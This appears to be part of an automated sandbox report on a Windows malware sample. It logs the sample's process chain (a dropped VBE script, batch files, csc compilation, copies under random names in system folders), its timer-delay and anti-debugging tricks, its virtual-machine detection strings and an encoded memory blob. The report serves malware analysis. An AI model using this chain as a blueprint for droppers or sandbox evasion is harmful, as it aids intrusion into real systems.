                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592969
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592844
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592734
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592624
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592515
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592406
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592297
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592172
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 592062
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591951
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591843
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591734
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 591618
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeThread delayed: delay time: 922337203685477
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2936883785.000000001ACB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                                    Source: w32tm.exe, 00000024.00000002.1968593673.000002495B6D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                                    Source: bridgeportDhcpcommon.exe, 00000005.00000002.1935495899.000000001C26B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                                    Source: bridgeportDhcpcommon.exe, 00000005.00000002.1935537060.000000001C27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2928564491.00000000124D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: 544WP3NHaP.exe, 00000000.00000003.1654790197.0000000002BD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1869299662.0000000003421000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: 544WP3NHaP.exe, 00000000.00000003.1654790197.0000000002BD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\f
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeAPI call chain: ExitProcess graph end nodegraph_0-23661
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008BF838
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008C7DEE mov eax, dword ptr fs:[00000030h]0_2_008C7DEE
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008CC030 GetProcessHeap,0_2_008CC030
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess token adjusted: Debug
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess token adjusted: Debug
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess token adjusted: Debug
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008BF838
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF9D5 SetUnhandledExceptionFilter,0_2_008BF9D5
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008BFBCA
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008C8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008C8EBD
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"Jump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"Jump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002819000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.00000000027A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: 0_2_008BF654 cpuid 0_2_008BF654
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_008BAF0F
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeQueries volume information: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe VolumeInformationJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe VolumeInformationJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
